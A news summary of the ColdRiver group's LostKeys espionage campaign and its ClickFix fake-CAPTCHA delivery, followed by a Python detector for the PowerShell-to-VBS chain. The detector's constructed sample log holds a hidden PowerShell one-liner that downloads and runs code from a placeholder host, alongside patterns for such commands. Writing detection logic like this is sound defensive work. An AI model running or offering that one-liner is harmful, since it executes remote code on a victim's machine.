Securityaffairs
Image Credit: Securityaffairs

Russia-linked ColdRiver used LostKeys malware in recent attacks

  • The Russia-linked ColdRiver APT (tracked by Google as COLDRIVER) has been using the LostKeys malware in espionage attacks on Western governments and organizations observed since early 2025.
  • ColdRiver primarily targets NATO countries, the Baltics, the Nordics and Eastern Europe, including Ukraine, focusing on current and former government officials, military personnel, journalists and think tanks.
  • LostKeys is delivered through a multi-step chain that starts with a fake CAPTCHA page (a ClickFix-style lure) which tricks the user into copying and running a PowerShell command. The final payload can steal files from a hard-coded list of extensions and directories and send system information and the list of running processes to the attacker.
  • Google’s Threat Intelligence Group found LostKeys in highly selective ClickFix attacks in which victims who ran the malicious PowerShell command ended up with a VBS payload that performed the data theft. Two additional samples dating back to December 2023 were also found, and it is unclear whether they belong to COLDRIVER or were repurposed.
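The chain summarized above (Run-box PowerShell one-liner, then a VBS stage launched by that PowerShell) leaves a recognizable parent/child pattern in process-creation telemetry. The following detection logic is an added example written for this page, not code from Google's report or from the LostKeys samples; it runs over constructed, Sysmon-Event-1-like `key=value` log lines, and the command-line indicators it scores are generic ClickFix heuristics, not LostKeys indicators of compromise. All process IDs, paths and the URL are made up.

```python
"""Detect a ClickFix-style chain (Win+R -> PowerShell -> VBS) in process-creation logs.

Added example. The log lines below are constructed, Sysmon-Event-1-like records;
the indicators are generic ClickFix heuristics (assumptions), not LostKeys IOCs.
"""
import re
from typing import Dict, List

# Constructed sample: one process-creation event per line, key=value fields.
# Event 5212: PowerShell spawned by explorer.exe (the Win+R Run box) with lure traits.
# Event 5388: wscript.exe running a .vbs whose parent is that PowerShell.
# Events 6001 and 6100: benign look-alikes that must not alert.
SAMPLE_LOG = r"""
ProcessId=4120 ParentProcessId=1180 Image=C:\Windows\explorer.exe ParentImage=C:\Windows\System32\userinit.exe CommandLine="C:\Windows\explorer.exe"
ProcessId=5212 ParentProcessId=4120 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell -w hidden -ep bypass -c iex (irm https://captcha.example.test/verify)"
ProcessId=5388 ParentProcessId=5212 Image=C:\Windows\System32\wscript.exe ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="wscript.exe C:\Users\alice\AppData\Local\Temp\stage3.vbs"
ProcessId=6001 ParentProcessId=4120 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell Get-ChildItem C:\Users\alice\Documents"
ProcessId=6100 ParentProcessId=3300 Image=C:\Windows\System32\wscript.exe ParentImage=C:\Windows\System32\svchost.exe CommandLine="wscript.exe C:\ProgramData\vendor\inventory.vbs"
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

POWERSHELL = ("powershell.exe", "pwsh.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Traits of the one-liners ClickFix lures ask users to paste (heuristic, assumption).
PS_INDICATORS = [
    re.compile(r"-(w|win|windowstyle)\s+hidden", re.I),
    re.compile(r"-(ep|ex|executionpolicy)\s+bypass", re.I),
    re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"https?://", re.I),
]


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value line into a dict; quoted values keep their spaces."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_stage1(ev: Dict[str, str]) -> bool:
    """PowerShell launched by explorer.exe (as from the Run box) with at least two lure traits."""
    if basename(ev.get("Image", "")) not in POWERSHELL:
        return False
    if basename(ev.get("ParentImage", "")) != "explorer.exe":
        return False
    cmd = ev.get("CommandLine", "")
    return sum(1 for pat in PS_INDICATORS if pat.search(cmd)) >= 2


def is_stage2(ev: Dict[str, str]) -> bool:
    """Windows Script Host executing a .vbs file with PowerShell as its parent."""
    return (basename(ev.get("Image", "")) in SCRIPT_HOSTS
            and basename(ev.get("ParentImage", "")) in POWERSHELL
            and ".vbs" in ev.get("CommandLine", "").lower())


def detect_chain(log_text: str) -> List[dict]:
    """Correlate stage-1 and stage-2 events by PID; a linked pair is high severity."""
    events = [parse_event(line) for line in log_text.splitlines() if line.strip()]
    stage1 = {ev["ProcessId"]: ev for ev in events if is_stage1(ev)}
    alerts: List[dict] = []
    for ev in events:
        if is_stage2(ev):
            parent = stage1.get(ev["ParentProcessId"])
            alerts.append({
                "severity": "high" if parent else "medium",
                "vbs_pid": ev["ProcessId"],
                "powershell_pid": ev["ParentProcessId"] if parent else None,
                "powershell_cmd": parent["CommandLine"] if parent else None,
            })
    # A lure-style PowerShell launch with no VBS child yet is still worth a medium alert.
    linked = {a["powershell_pid"] for a in alerts}
    for pid, ev in stage1.items():
        if pid not in linked:
            alerts.append({"severity": "medium", "vbs_pid": None,
                           "powershell_pid": pid, "powershell_cmd": ev["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_LOG):
        print(alert)
```

On the constructed sample this yields a single high-severity alert linking VBS process 5388 to PowerShell process 5212; the plain `Get-ChildItem` launch and the svchost-spawned inventory script are ignored. In a real deployment the PID join must also be scoped by host and boot session, since PIDs are reused, and the indicator list should be tuned against your own baseline of legitimate explorer-launched PowerShell.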
